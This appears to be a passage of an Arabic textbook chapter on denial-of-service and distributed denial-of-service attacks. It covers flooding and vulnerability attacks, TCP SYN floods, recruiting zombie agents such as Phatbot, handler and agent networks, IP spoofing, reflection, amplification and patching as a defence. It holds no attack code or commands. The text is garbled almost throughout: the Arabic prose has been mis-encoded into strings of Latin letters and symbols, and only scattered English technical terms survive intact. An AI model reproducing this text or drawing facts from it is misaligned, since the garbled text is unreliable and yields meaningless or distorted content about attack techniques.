JJC lcLal^.1 2^=^ ^ ^Ld^iJl L. La^a ^a j^A .<^.^pJl jJl ^JaJdjVI (J^-l (j^ ^J^V^ LS^ 0 Cjl£jJa3l (jx» ^jAslSI Jlj 

i o ^ (J^.I^JJ jl <C^)judJ L_jj£j aI^aI] ^iij (JIjujJ (jx» A£^)Ja3l ^L<^ ^ _^!>Iasl!I (j-a jl 4<alst-<i <J^L^xi 

Jc J jj^a^Jl 

(jc ^Ldl^JI CjLd Jx-<J! ^aj^i j > L_fljj^3l j 6^U^£3l j ^.UJI JiLd ^LalxJI CjUa^JI Sjbj <Jjg > >nl CijjljVI cil^^lml ^j| j!L 

4jj;iaJl CjLd^iJl (J Vitj (_^i3l *L<i^iJl ( ^a yzJi cilLiA j ^LojjVI (jSjoJl JJ^>^I ^^>^ J (jnqVill J^J^J C^al^-Sl <iajauVI 

„ jjoJI l^Jl Ja. .CijjljVI jl jj jjj^ll oj^-U ^iLjaijl -laiijj V jll (JjjUII Jc Ja. jjujti^ l5^^ JjH J^^ j 

(j-d <>i^Jl ( ^a jaA UiliJ ,^laA^VI J l1^*^I lV^I jl S^J^ (JjjIjojI Jc CljjljVI ^j^AaajujJ (JjjUII (jxi •^•^c 

J g ll^J J (jjjc-jj (jjill 6jLoj jjc. ^-JjaJ l^Jl ^£j>Jl (j-d3 6 J^iaa JJJ^a ^1 ( ; UjujJ V ^ J^lj a lajuljVI (JlaxJ (jl (j^A^ll 
4(jIaljC.VI Cljjljyi ^1 laJLujI (jC (JjjUII L_fl3jJJ (jl ^^.jaII (j-d 6(jLl^.VI (j-« J djUl JajJaVI Cjj^. <!L^. J 
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hk*A\ gil jilt 

jj£j jl j£-aj La .4jb ^ J 4jIc Lajb diujj] t^jLjiikll J Ia^ ^Axi t JaxJI 11a ?(DoS) 3-a^aJt j* jLajaJt J) uj-^W^ cs-*-^ 

CjUjV Jlg_i3l L_fl^Jl jl£ ,4_L^alja (JjS j-a t . it L c£^l £-1 j-ajl <JaLudJ jl ^a j^-9-a iL^V clijl£ J^J-a i3j J <La,laJl u^a dll ^ ^ jx» (J^H 
j,a ^jiaxJl ~* - tajU 4_JjLa^aJ Liajl jj-aj£j (jj-a^lg-xJl jli 4 jLia.VI j-a (J .^-^ J? ^ (J-^ ^ 

(jjmV^ AAaJLujJ j . jjLa^ig.xJl <Jj3 j-a 4_ilj ^t-uij bjj-a <Jj^ V CljjljVl ^C 4jujJj^3l dll jja .<La,laJl j-a jLa^pJl (J^Lk j-a (Jj£lll 

tl^J] <J jj^ jll J ^£^JJ SUS Luul (_£,i3l ^a^JjauJl . jj^kVI jja^l g <all £-a jjlS J;i*Jl dlLa jLlxJI j ^1 J^VI SjLaal j S^Axla CjVI ^ jaJfc 

^ j^Jl CjVI j-iAa. l^j) sUSSI Jc 6 j Uu i M a!^ Aijjia .[owner] tSlSLJI jl [operator] Ji-^i < [moderator] ^ cr^j 

. JL^JI L_fljjuuJl Jc <La,liJl t . la a ^a jaJfc llill] CjVL^jVI gj*^ Jc Cy^i ^ L>*J '(^USII *>^A (jfcjja jC- ^£^j3l ^aJJ jll 

jLa^pJI <J!)lk j-a aliliVI Ljajl uj^t^ <s ^ c^*^ t(jj£i3! t . <M ^ J| _sLa3l J jj a i^jLuiaI] j^j 4-^-3 'L^-a> <!! L-iAii UiAic. 

jjoiJ Cj^jII Ijl jaj (jJ^I (JjjUII " ytl\" DoS ^Vl ^-Sajujl JJ UlLa. I jSjia jjill 4ij^alji3l jLi J-dj .A^^kll 

(j-d 4^ jLoaII CjI^JjuoII j jJl<a^3l 

(_^V ^iUl li^ L_DJ ^aJ 6(jVl (^5^- .(Jj^^ 6 ( -jJUJ^ (jj^LLall <JC.J ^iUl (jj^J (jl JJJ^J (j^J 6A£jjoJ| jA ^a j^gll (j-d L_fl^Jl (jl^ lij 

(j-<» ^ rdjax]! A-uIUlII (jc V (t>i j^ ,*L<»^JI L-i^a djLoaA ^ilj^j oll^J! ^^ic CjljUJ! ^k ^ j^- ttillij ,l1jIa^JI (j>» 

.^iUI ^ ^5^* lS ' cJ^aLd ^j'q^M ^> ^Vi V c _^j3I cillj (j^ _l$jfl ^j'q^MI (jc c^LaU cdjl a-^&W 

,(jjjoJl (jxj <jaial_L<Jl o^Liall (j-a ^Lij jjlill J;ic. JjLoj jll oi^ L^Jj CjI^jjuJI (J^aau (jl LdU»J (j£-<uJl (j>» 4J| (jc tdjAUj 
( . lilajj ;4_xi^iJl (j-d (jLd^pJl £a dljjljyi <jjL^j3I JLocVI ^.^J (jj^^l $ a\\ . jl j^VI dJjLa. 4CjUl^JI (j>» b^C ^-la tl^a.j^ 

■ JJ T > *a (jUaJ Jc CjIa^JI 1 ^jIc c£^>a*J ^3^31 (jiafljJ jll ^al ."AjI (jx» <JLJ! (j-d ^L>» 

(jiajill pllll ^aJ (j^3 j 6 alalia (JjjLojI Jc Cj^j djU^gJl (jxi L^VVI (jl diLojIj^ll (j-d 5J^I Uj^3 ^DDoS iUi^J (jjl^l^ a\\ SUaJl ^aA (j-d 
tSLjaLLJ jjjJall (j-<» ^^Vl ^iJj Jc ULauJall ftj^S ^a.^C Jj bjj^- ^^-J^ ^ . a A J (jj^7>l a\\ (j>» l^a. JJS ^^C Jc 

(jj^ ^Ld^Jl M^ 31 r* ^ J^"^ ci^^ JJ^' 1 ^ Ajlc L_fl jLk-d jl ^aUuAVU 6JJ^. jA ^Ic^Vl (jU ^joiJ V A-l^jJa3l (jV Jl 

^ j y\\ (j^J jll ^ajl^aJl (j-d 6 jjir > <1}C (j!>Lk (jxi L_l£jj-<Jl 4 j> >*>1 Jc ^a£^Jl (JjVlm^l (j-d ^^juUIaI] ^jjVq\ *^J^ 

V cjIa^JI oIa Jia jl j^ J . jjj (j^a lfr»hviml j dujjjVl <— j^VI oIa Jj^^lj u^j^ *Vj& .script kiddies 

JlLa .a^I g aII (jC J;i^l P^i Jc Ij^Ui (jj^ C5^ jjQQ^ al] jU^VI Lpa*^ J "S^^ jljl ^J^J CjLa^Jl d^A Uiajl t4_l^jJa3l S^judJ JjoiJ 

jj^i <iajuj| 1 ^jlc 6 JaJjuJ! (j^-aJ J^^J ^ J^ > ^C ^^x^l (j^^ JJ^>^^ ^^>^ -^aj ^3 jj jU^VI (j-« J ^aLiJl CjLa^Jl o^A 

A£^a. iaLajl J <LilaJl J^ cJ^-^- (j-* ^J^ (JJ^ial (JjLuj j S^C jjfljla. <all jail ^AaJLoaJ (^ill j DoS ^ (j-a ^ jj 

lU^JI s-^ ^j j Alk ^ t4 Vij . nil l cilti (> l^jjJi J3! ^ CjU^SI 6 1a jl jj^ J .bypass defenses Jj jj^^ 

4^^^. Jja j^ ^ IjjjLJ ^aJJ ^3 jl ^taliiU jl ^.^Lajll S^jb J (Jj^^ L^-\ j-a ^1 ^'^ LaAjc^ 1 g > nVl ^lalj j-a J-aAJ ^3 6jj LlaJI 4_l^ljl3l 

^Aj-al^a.j ^LaJala jl 

CjLijSj ^ab^luilj tilli j t4_j^LaJl AjI j^I jLajjV 4-^.lla ojl^a j Jjl j-a l^J^ jll j j^l lS^-^ J^ QJj^>^ J^VI (J^alai ^11 ^.l^all 

|^ jIjI J^ $ ^ !<^A JLa .1 ^jlc (J jj^^JI L-lau jll AjjI jl IsJLujVI ^jl jxJl j-a o^lilajVlj tojjIalaJl b JaJjaJlj o^Liall 

j£-aJ jll l^juoij L_kstjJa3l Jalaj (J-aaJ A^^)3l CjIj^I jj^J ttilli t ■ ul a. Jl ,4^jJjaLa CjIj^I jl ( . ull i ul ^al laJlual J jIajujV I Ja*. L-lau jll 

.(JAuiaII J Ljajl L— )>la>J ^3 \ g J^lj ; jVI CjLa^Jl d^A <JlLa ^flj ^3 bj ,^a ja^Jl J ja^j ^lia^V l^J^lstlajl 



4-uIa ^^Lua 



1018 



t *<iT > >i <Jakj (J^IsujojI ;<-<i^JI jL» jaJ A-iuujJI l-uHjujVI j* jlc jj <ilUA 6 1 <Jj^il! J j£i ?*L<»^JI < . a t * a j^ 

'vulnerability attack i> JjVI ^jJI ^5-^ U s^tc .<c jj^ JSI jll c> ^ jj J <-^l Jc s^j^j* 

.flooding attack Jtill J^- J^ ^? 

11a .t^jjall c^ULqj ^ill lJ^JI ( jnWfl h ^ u ^ c ii xjj a j ^1 JjL-uj Jl l>«j JLuj jj ^jia jc Jaxj Vulnerability attack 

jjc. ^IkAxi JlLdJ ^.lg_xJl <Jj3 j>* 4JmiJl JjLoJI m 4 m a <-<i^J C5 jJaljjaVI jJj^jll J <Jlk jl ^cxal jjII >jjAjj J <Jlk S^lc jA L_a*jJa]| 
S^lc] jl 16>1ia^j t4 tS^juoJ AjUajV .AjjI^j V Ail^. J L_jlAi3l L_fl^Jl J^Jjlaj] ( . UjujJ (JjLoJI .(jjllnlll £C^JJ-G 4jl3jJJ ^aJ j £3 jJ-a 

C *<>■>> >l <iaij (J^^lxlall A-AaSlSI ^.AlilS . jjJC JjuJI jj <Y laJ ul <flll jC <Ld,liJl ^id J Sj^lill j-G SjiJ^ lil^glnll jl 4 jlg_^Jl (JjXjuJj 

I^UiJ c j^j ^j^l 11a j* < ax^al ) Jalij ^CjVUJI J .Exploit j ^in^t cJ^Jt C5^J '(exploiting a vulnerability) 
j* -ul jj^ J .CjllifSalll ^cJ jj J j 6a£jj^3I J j£ jj jjj J jl (.(middleware) ^Ijl^Jl jll j-* <*iaa t J ^ - J^ l ^Ikj J 
^^jaj 11a .(new exploits) J^ jJ*-^ ( ♦ 1T * ^ uj-^ u' 6C axjjnli Jalij £j-<^ c Jj^im^ll 

.^jJJtit^ftll ^aUiVI 6 jia^- J Jf^ L-Jjuo^q jA l^J^ > ^il j Igic C Luo^H ^aJ ^ill C <>■> > ^1 Jalaj j£ jl 

(deny service) o^fl jj ^^-^ qa^Z cr^^J ukJa LUj 1^1 802.11 ^g^t^ Jj£jjjjj lj! \nh1 j^axj t JIIaII Jjxui ^ 

Cj^tuaj^l uBjau Jxj ^jilua^U) Jj-ua jl! ALIj ."hang Up" A^Ayall (JjIxj Jjjjj ^JIj! ^,^Vnnft1| (j\ Jj jj-uu j t jki ^,lVnna 4jj ^ Jjj 
.Aijjlall (jAL Allp ^Alj &H (jIaj (jil j c Jj-ua j 4jalj ^ Cj^LuajVI (Jjjj^Ij dJlP) - laJL oaI] (jIaj .lJj^IuiaII ^^"h noti (j-a 

t Jllftlt Jjjjoj Jc^ .<-i^l J J^ ^ ^V^j Jil cJj^j Jl c>» JLuj jj (JjjSa jc; Jaxj Flooding attack 

jiajC ^jjslJjoiJ 6JJJ^ (JjLujj '(CPU Cycles) ^0^>^ a * ^ ^JJ^ C^II^LujJ J^^J ^ (JjLujJ jla>» a a II * a l . lllaJJ 

jla ^ j^JI c^^J^ ^J>*^ -^J .ftjSlill till^lujj JL^aj*Vl i^jj cJj^jj '(Bandwidth) (jUajll 

J '(*2>aJt ^jloui J ^j£ jl ^ Flooding attack i> s .<^^JI Jjj j* jj# jaUI jj^^kl^ll jl*j V 

;Ajjoijj Jl CjIjojI^juVI j-« ^ l-^A j .^5 jSa^Sl 

jjjaI! A^j^J ^Jjoisu (J^uij (JjLo-d JjJ^l ^-^^>^ ^ (J*^ ^ ^ <oJ a j^Jl j^ A-C- jJJ-« Ac- (JLujjI jjA^I ^ a1] j^J 

.dilc-la^l j^ cJ^^ j j*^i^ 

JLojjV ^lj jVr> j-« J^l <ill JJoib ^aj5J 6^lc a^>1 g aII ,L_fl^Jl ^jl jx» t^II^jjujJ <>— Lla J 6JJJ^ (JJ^ ( ; JJ^>^^ ^^>^ 

.DDoS sjIc Flooding attack ^ . jjj^^ J^ 
tilLiA jj^j ^ _<j2kjja3! jl^a> Jc- A-^^ Jl '(O^ J^ ;(JjLujJI j>» 1^ ^jjj^ (J^jj j^ DDoS ^ u -0 cJ^j 

\^.f.A (J^IxjII j j^Jl Jc cJ jj^^JI A-! jt^-Q J A-iikjJall ^jl jd Jjj L_fl jjoj Ajli toi^ L_jila3l ^ j^- -lalijajV A-iikjJa3l j A a-\\ $ a\\ CjVI jJJ Ujjoi 
.A^jS l^J jj ^ j^Jl ^ cJ-^l-*^^ ^ J^- 0 J jl Q ^ ^J^ J* lS^ (_3^\^»1 t^a j^Jl j-a J^J La (ilLiA jl£ lit .^J^ > ^> lS^^ 

j£^j A-iauJal l jl^2> J <^jj^3I <alkj Cjjl£ lil . A-iauJal l (network interface) j ja DDoS ^ ^ 

IP ^3^- L>^ J^ ^1^^ J ^^I^Iaj^q JO ^ jj ^^>^ ^^-^ f ^ ^ 6 JJ^>^^ ^^>^ L>^ ^1^^ J i ^-^\^ L ^ A 10 ^ cJ^I-*^^ 

L_fl jjuoS 6<J2kjJa3l A^.1 j Jl c)^ ^3^^ ialLajlj ^aj5J jikl jUS ^1 ^JJ V Aj| jial jjfll Jc ^A-f^jJall Jl I^JLojjIj \ £ L > jj] 

Jl AiLjaVb ^C- jJjouJI j^Jl j-« t^SUA jl£ lil .4_l^jJa3l (JJjla Jc Ji^ ^al-2k^ jl ^Lodl l-^ajl J A-! J^ > >1J A^JjaJl JjI jxi .^nml 

.^a^kJI Jjjj jl Jxu^Jl jjc; jx^ 4^a jaJt ^aj^A j* jjj£ (Flood) U^ 3 ^ 
1 4_j^^jj Ajljoj dlli A^JjudJ J uald jl a^>1 g aII L_ fljc lil ,dljjjjyij <JikjJa3l tgJ J - aJJ ^^jll <jla aSI <£jjaJl t fl ^ i aJ jl Uiajl g ^13 
^a J^A j-d ^ jjll liA J .A-ilc ^^Jtiaj] A^JjaJl Jc ^5 J^-VI .JAxJl jl A-likjJal3 ^a j^Jl j-« J^ ^ lS-^J^ tAjjljll J C-LjUl 

(3^Jj t - iDDoS ^-Bj^ ^ j > ^ ^ cJI^-^^ I^a ^jjajj , JiiUui j^j Jc jl-*^* t — s jwj a£jjoJI ^laa Jc <_£j^Vl .jixJI j-<i J£ ^DDoS 

j>ui ^aA jJC-j ^4^^k]| Jc (J jj^a^J! jjxjJaJjoaJ V O^^^) U^^^)^^ jJ-d^Jjai/Jl Jc \ - taJ) j^J t4_iikjJa]| Jc Ja^S JjjJ jjjJall 
A^jak ^a j2^A jl.^>» jlS lil . dij\ Ia£ ISP W^ 1 ^ Jl-^^VI aSliA t A>j^1ujJ ^3 aj>I g aII ; JllxJl cJjJjoj Jc ,4_2kjaJl ^jl j<Jl jjjJaLaiJj 

.ciljUi^ak j-d ciLijau jl Uiajl j^J 6<jli^3l <j3 Laj jijJ-<» JJ^>^ 
CjULjajill ^a j^A l_j1^jjI jUakVI (J^axJ J clA^ & a\\ . JjJ-^l ^^>^- £y* *^J^ J^ ^^^-^ cjj^AaII diLaak^Jl ^J^> .Vn>>n 

A jaJU^i djajll j^ ^j jA\ c_Akij ^1 j ^1 CjU^kll jia*j <jJ AjauJal l jl£ lil . jjj£j jij^ai JUilt (Flooding attack) 

C5 lak , jjbjJl I^A j-a D^liloaVI g <oA3 j^-GJ Cilia t^a^Lkll Jc dj^U Jjl jaJ JaJJJJ jl t< ■ llla]| I^A ^j3 jJ j>» ^ajL U» jj£l >JJ*j]| ( . llla]| 
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U si^ j <TCP SYN ?> f ^ Ja31 (i 1 >k ? ^ .U*V J^ilb <_L^ j2 ^1 <TCP SYN flood 
cj' J to^j^aJI JIj^jVI ^ Ala A^ a J (buffer memory) SjSlill 4_i^jja3l lail^j .aja^. JU^jI ?^A ~ i^i> 

J t^a j^-ll A^-^ A^^l (Jjlaju Jc ^.l^xJI ^cLaaj (JjUAI .Sj^lAI J AiKj ^_$\ cA Alall da* A-^j^ a ^ ^ g Al 

.l^Lu. j! TCP SYN ^> c> 1^ JJa ^to J 
'{flooding attacks) CjUL^iAI ^ j (vulnerability attack) * *^ > ^ t JalSj CjU^a jjj J^aUll JaaJI 4A£liAI jj 
cjUI > >ijqll ^ j^a CjUa j {vulnerability attack) c q»>^l JalSj CjL^a dUa A^ J ^ CjIa^JI ^ ajasAI u' lA^j 

.{flooding attacks) 

(Recruiting and Controlling Attacking Machines) ?JH^ cjLLSU 4-ilj*j uLJajj 

.^t$-A( Jj ^ rtln V CjVVI ^Uj .A-iau^aH Jl jjj^I ^ j^a JLujjU ^ jSj cJjjoj Jll j <c_iVI cSlljjuil L-Akjj DDoS uUjb 

6^31 jl^U ^jA-£-Al ^j£j C >% n^> J^JI I IjLuU.H J.A I J J 3 * ?<J j^-Al J CjI^JjuJI J ClAjuaLaJl J 4i jAi'rtA A qjt > ^ *L<Jaj| (jj^J La SAx. Igil 

(j^LjuJI '(zombies) ujj-^A^ ^ j*>&^ J ^ <oVimj Jll ciiYI ^miS lj^ ttAlA j^^ti ^a jj> >»vi j dlA^ll Djinjmll a^Ljj 
.(agents) <^jll ^ik^ ^^ki^j lJj^ lJ&1\ liA J .(agents) <^^j3l ji '(slaves) ±u*^\ '(daemons) 
^A o^A ^1 ^I^J Cjli ! jjjSj U (agents) ^ jll ? LfcU^^ ^^-^ 6^ 

^Lojuj) (j-a CjIc j)A~y a AiLa caJ > nj 1 g liA^j ^A^ ( ^ A£ ^» CjULoi^JI .(jAjj^u^Ai ^1 l_jL ^ ajA Lo£ 4^UaAI ^Jl ^ ^ 

< * a uj^j ^jl 1 g j1 uj ^j-d ^Al ^JuJI 4^A£ ^)joi£j ^jja^A CjIj^I o^c tALiA . jl^ a II > nj A ^^-AIj ^ujjj ^gLA! ( & A£ j! ^LQAaJLu^Ai 

' ^ j A^^VI Aj^j * Phatbot ^ JliLcAl A^f^ .^j* ^ jjj^ ^^A^ <j ^AjA ^UaAl Jc cj! J uiaJI ^ ^1 lil <c^judj 
CjULud^. ^cxilj^AI 11a j jl J^ 1 J^*^^ d al (j* djl jjuoc ^j-<i <c ^ ^I^jjojU Windows <J j^-AI 

^jl (j^-GJ L_axjJa3l Jalij A^*^^ cJ^-^- £y* j' 'DDoS ^ A^I^jjojI ^Ijoij A^ V A j5l l'^-3 t Ajj->-"-AI djl jLiLdl cAjA ^A 

^jj (jl j I Aia. a ^L^jaVl jIjI A^ u' DDoS attack agent ^^j/^j ^j^j a qj^Al Jc SjUjuill ^.l^AI l_jLou£I ^j^aj 

. jl^JI ^it_>.*>ij o^lcj Asu J^ A rtjAI A j^VI cJ^Ajj 
,UjA3 Ig-Lo A^ ^l^ialj ^j5j g Al lij dja jll <xjjja>ij <Lui (jj^laj jll L_flVI ji Cjllft Jc (G jiajj Lft IjA^ DDoS 

jjjflj j t t^l ^ a\\ j j-dl Jc pUj J^gJl 6 jijuj C-UJJJ j rtl ^T^l j iA \a")~\ a\\ A^ jll t— iVI ^ *^ un^V Alx^Jjxi dil j^l cAllA tcAli ^j-d 

_dijjljy I a£jjoi Jc 4Aj^jAI Cj! jja ^ l^Ac A j^a^Jl jl 4-yj3l I^-Iia^j ^jj Jll CjI j^VI a1 > nj (j^j .Ua Jj jsAI ^^-^ 

(Jjla jj j ^!>l£ jll L_jisu cJ^la. (j-d A^JjaJl Jc ojIaJjaJl (Jj^ > uJ Uiajl *^AV1 CjI j^VI jll (j-d <C jrt^ a c flAa jJ Jj AiLjaVU 

IjJaj CjULjajiAl ^ jll ^j^^ I^jj J^ ^A^.! j ^1 jIa^J iaia ^.l^AI J ^—^ J J 1 jVI cJ^^V M1 



(HIDING) 

^JLojjV CjVI jl 6A^.I j ^a^jjojj <j| c ? *n^> j IgJ aS\ <c. jl^AI dAlAa S^c (j-d ^_>A^ cJ^^ 3 CP" & ^ J^ 

-a-A ^ Akludj l^jjoj 11a J .(handlers or masters) j^^ cA^Jl^Ai oj^VI ^^^j .^^j Jj j-^^jVI 
.(Handler/agent architecture) J^J^ / gH*-AI SjL^ll ^ J^A^ J^Ai ^^j^ .(handlers) CjUJU^JI 



Ai lacker 




DoS traffic 

ls a±j£ j .(handler) cjI^JL*--^! J] J jj^a jll JjS tj. in lt. n j ^ ^Vl s^c- g a\\ Jj-> > >n ^ uj^-" ^ j^j*^ t>* lsj^ <Lia 
-g JU]| JUJI ^jjalj L£ 4 stepping stones W^- cS^j (handler) cjUJU^JIj ^l^ll jl^ o£ <Ja^jll CjVVI 




Command/control traffic 



a!\ (j-a^i j ^.^i CjlkLaJI dula lil .( jjWil i CjV jU^ <Sa jc^ ^ stepping stones j (handler) cj UIU^ I J£ ^vimi 
jAj l_a jjoj -Gli (handler) ^^13 L >^ill ^ .iij* ^ .(handler) cjKIU^I ^ s^l j jjj^j jl <Jj£ jll 

sjIc ^j) cjljlillj jI^LII < allk^ t> stepping stones ^ ^] . j^' stepping stones U-^j 'stepping stones 

.AjJjA (jC L_jlii3! C ftJUJ^J ^1 g &1I Ail ft*J J»Jl Ajulld 1^. L-J3U ^1) 6 (tiI3,JJ QJAjLl 

Jjjjaij* CjLg jlx-a (J^asu Ja^J CljjljVl 4£jjui ^ ^-a -IP SpOOfing ^ Aa^Lujl j!)Lk j& ^ j^^l L-laLaJ <_£j^.i 4-1^ J 

Jj£ <> l^L ^jj CjUjkJ! ^ .source IP field j*j ?J^j*ll Cj\j^ ^ £ IP header ^ ^j ^ .IP header ?cjUUJ! 

jLuixJI jlll! ftj£^j jl Jj3 ~ iklLaLjj t(^jjjj£3l Jjoj^xJI ^ji jjc £jJa jl JjUu* s-lj^.]) <Laj^J! JjuJJJ jlfr^JI 

L_flLau£l 4_Sajcj CjLo^J! ^jc L-jLaxJ! dL>liyi J^'q^*^ JL^xJI I^a ^ u j 1 u ^ ^jj^^l g ^1 ga^ll JLujjL jll 

jjj JAlrful] j^aJl jk; Axuxj DDoS gli^ll ^aU^ lP 3 *^ ^ C5^) ^) ^ IP J^"^ . J^ jll 

Lq ^jAxJI (^5^. jl ^^c- jjoi J^c (j^ajs > 11 j ^ j£ cjp Spoofing ^ .uj^?^ <s j j*^^ 

(MISUSING LEGITIMATE SERVICES) ^UjiJI Sf Ut 

<^.ll<JI jtli^ ^.l^xJI .DDoS <^ a£jU1a3I ^ LdU»j 4_l<»V!j Aijli^ jaiSI ft ^aja (jl^j IP spoofing 

^ ^jl ^JC JJjjjj ft^J^C CljUlla Jwj^)J ^aJ (j>»J J ^r^J '(DNS) U^J 1 ^^ ^aUaj Jlxi tj j£ j! JJ^ ^ 

djU^kll j ^jj-^lg-All <jjau3U 4_j^aU. li^ .(reflectors) cjLo£UJ1 <ja a£jU1<JI ^^1 j^JI Ls ^l j reflection attack ^ j^l 



^ https://www.facebook.com/tibea2004 
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(jla. ^ ^.l^xJI o^ij '(amplification) ^ > '^h l**^ ^ cijUiia (j* 4ajU d^j^ jl <LjIa ^ j Jjj jl V^*j ^1 

(Distribution Effects) &0j^I 

.(j^l^ U^j JaAj <i£3 <(DDoS) tuj^ ^l^ ^l^ikiJ jj^ ^ <l> ^Uall (jixuJI ^ (Denial of service) <*^JI c> j^' 
10 j t-ili ^1 j (pure flooding) djULja^l qjLJ 3^aJI < f u' ^ JliLJI 

^a.1 g all jli ;4_ia_jJa3l Jajlj ^^ic ^jJaJ 4_Ijla»xi ^i Aa.1 g all .4-^1-^1 <^i Clul au^o 100 ^ 4_L^j 4_iajJa <ll jai ^-J^ tAjjlSIl ^ dul au^o 
^ajL j) t . iNj ;^-l_aij 4_ia_jJaII CjVIj^jI (J-Jaau] m Al <La,laJl (j* (jL»^)aJl ^UlLj 4j <j^laJI 4£jjual3 CjULjajS dj|*lal ^1 (_£-^jJ <— fl jjuj 
J jt > ^> I j>»l (jj£j 4_IVI JlLd ^aLajilj (jl£-a -1}-!^ .4_ia_jJaII jc 4£jjuo3! ^jl jx» j>Jl J^l j^-?- C3^H ^W*^ 

1 j^ J^J^ j^? <J£ .<*->Wl (j* cAlalt j* t^lo <(DDoS) £Uj^ ^ j^-SI \:° v; ^3 lit c-j^j Lai j 

<£^>a. (j* ^^i^j La ^3 jj l^_L<i LI (jli tA-ijliill ^i dul aux 10 dj!>L^ IgJ djlJL<JI CjVI (jl (jialjlial ^^ic .4_iajJaII £>l_aj 4_ijLi3l ^i dul jt-Lo 

^<jaUa <J-<il^J (J-^ (Jl V ^.l^Jl (jl (j^ ;4_i^jJa3l (jc 4^^k]| (J^J ^1} ;l^£Aj ,4_i^jJa3lj (j^aLkJl Cj!>L^ jll 

^l^Jt ^1) jiijili <> Ujfr uJaj (DDoS) 50j2J1 yto fXUS f 
jl^. (j>i jii^l (Bandwidth) (j^aill o^j^ ^j^ j^j ^j^^^j ^-f^ daLi^j (j>» j;j^l C5^^ j - ^^ ~o^i/~ ^L^JI 

^jl ^<JI ui ^ > L_a jjoj iaia ^.1 j cJ^c- cs - ^ j ^ j * >1 J ^^l (jli ^UlUj .^^-^-i j-^l l!^*^! 

AjI^J ^fl Jjt ^<JI AicLjaxi ^^1^ (j^^ 6 (DDoS) ^ j^^^ CjljVqMl ^hVimU ,V jl ^\q^ m (jjJ ^^Lkll ^^ic ja. jA\ 

.lJ^JI ^ Sjfl jJal CjVV 4^^k]l jili (jl 4-1 

^^jll CjUl^aVI (J^asu iLajl (j>»j cJ^ J^l \. v W ^ ^1 ^l 1 ^! (j^ '^^J <-!^J L>^ ^J' 4-*-l^Jl ( ; ^ ^ ^ fl3 jl 

(JjjjoixJI (jl^ lil Vj Igiflj (j^J 6,Aa.lj <!l (jxi g II tdlVl^Jl (j-« ■ JJ^)^^ ^^)^" L>^ f ^ a ^ J^jl (j -0 

^ j-s^l ^ 4£jUUl jll (jxi 1^000 jl '100 '10 (j^ .^^'j^j t^ijuall Jiold jl L(JJ&j jig a II (jc; 

jjjb o^a. (j-G t fljjaall (j^j IgJ^ jl ^ j J^Lk (j-d iaaa .^UajJal] S^jli ^a^aj V ^.Lq ^a.1 j (^1 jj (jli ttilli 

^ b ^\jIa lS^Aj f*^ L>^ 4-*^ ^l^-lj^V^ C-P^ il^SV (JjjUII (j-« L_flVVI J jj^aaJl (jl C-ua. .4-xi^aJl Ua^ 

jl jli jt$^J 4-1* j jl.i^al ^aii (j-<i j (handler) jl^aJI ^ jI^-aj (jjixilAxJI ^ajL t^jUa-VI o^xj 

^aJliJLuaJ jl oJAxILq (handler) L " ^ ** a ^3^'^ f lalLujJ (jj^ ^ ^a.1^51 (jl Clua ^Ljajl 6<Jxj^a 4 ^ ol^j e djUljJajall 

. jjuJI A-i^a^Q jl d jLixi (jj£j Jj£ jli jl$aJ <^a. j^ll ^1 jVI (jl jl '(handler) ^1*^11 c> (IRC J^) ^ jj^ 

t<JjT > ^ jj£| ^a J^-jl ^ jl (jli tdjjljyi 4£jjuj ^lail ^lA^. <^i ^jlj (jl^j (^5^- J'^ V jli ^aa.1 g all J^i^-I lij 

.^LAajll <iakj <Jail3l fii^ ^At.tiJ j ,A-iajJa3l (jxa ^-Jji^ (^^^C JJ^JI ^-^)^ ^ ^J^T^ J^^ <iaaill (jl C—Ua 

4_j^laJl Jj^Jl ^^>^ JJJ^H ^ AJjt > *a ^aj ^-ajjj t^a ^a^Jl (jc A^_iLq djUi^lc (_^l 4_al jj a£jjoJI ^ (_^^>^.VI ^ixJl 

j^-g-!l I^A AjJa ^li^ll S^cLouJI (j^-GJ V <ili t^Ulbj .<c jjJIaII jj^JI ^j^- (jc- ^ j^-g-!l^ 

(j^ ^j-<^ cJ J> *aaJl J^la. (j-d ^laull ^^Jc J^la (jj^J ^ ^jiajJall (jli 6^a.l j <Jj£ j (jxi ftAjjjj ^aJ (^ill *L<i^aJl ( ^ ^ 

£A (J^lxjll ^ d^cLoiaI] ^ ^1 J^- (^5^ j^li 4iljC-l ^aJ UJ^ ^ 6<JH<Jl Jjifjuj ^^^ic ,^jl j>Jl 

^Ja. 6j^a3l (jx» 4iLjal 4 i£ ^alA/Jl (jli 6^a.lj J^J ^ * (jj^ ^ *^ O^*^ .■4-iiljJaVI 4-! j^aJI 

jjl j^ll t flcl - ^IaJI jl£ lil .DDoS ^^1 J^l j^ill 1^ j^^H jli ^ ^l^JI (jjL 

_<l^aj ?(jUa.V! (j-« ^ jJl <icLjaxi ^1 laai ^H^J ^a.l^<iH (jli tdiUlkll J^C t *<iT > >i ^ J>ilxjl3 

pi jj! (> aj^J! AjJa ^ia cJ^^ e^l <*-ll-C.li-^! i^\jt^\ l_1xj^1I (j^ DDoS J DoS L>* CjLaaA <J*^ ^>^^ t ♦ ^ a 

^Jc- ialiaJ! j AjL^aJl j!.la. lIjjjjj] ^aUail! ^1 jjjoixi ^j^j ^3 tdil jluJ ,*L<i^aJl (j-d (jLd^)aJl AjJa SjjjjJalb <!lxi C-Lau] daLia^Jl (j-d (_£^>a.! 
^IgJl 2^1 jJl j Jjt <xJaj! (>« (Patch) Cjla-iau^ill JaliaJ! tCj^Vl AjjjjjJa jo>Jl iallxJl (J^V tjVl Aljj£i 

fii^ 6L_Luj^U (j^lj .^^a-jlaJl ^liJ! (jjj^a. (jljla.1 (j>» tT<< ^j]| CjlAa-gJl (jx» ^1 L_flLau£V cJ^^I c 4_xJaj| ^ixjoijj ;(_^^)a.V! 

;<J j^-d 4_jl_AaJ! jl.Aa. lA-laj ^^jII JjJ>J! ^^>^- (j^ ^ J?^^ clA^ .^*laJ! (j>» (jUi^aJl .Ua ^cLaaJ (jl Ullc. 4_iixiV! CjUl^aV! 

^1 ^glc (Jasu (jl (j^-aJ 64_iajJa!l ^jl jx» ^lilLajl Ja£2 DoS (* L — ^ jjjouJ! JJ^>^I ^^>^- (j^ ^ g j ui J-^^ 

^Ld^aJ! ( CjI ^.bl (jj^>l <S ^ (j^^ .Aj^LjlS! 4_ILgcIj ^1^13 6^1x1 4_a jiii-d (jj^J (jl t . laj ^^1 tillj l^iS Laj tla. jiii* ^jlJ! -^j-<» 
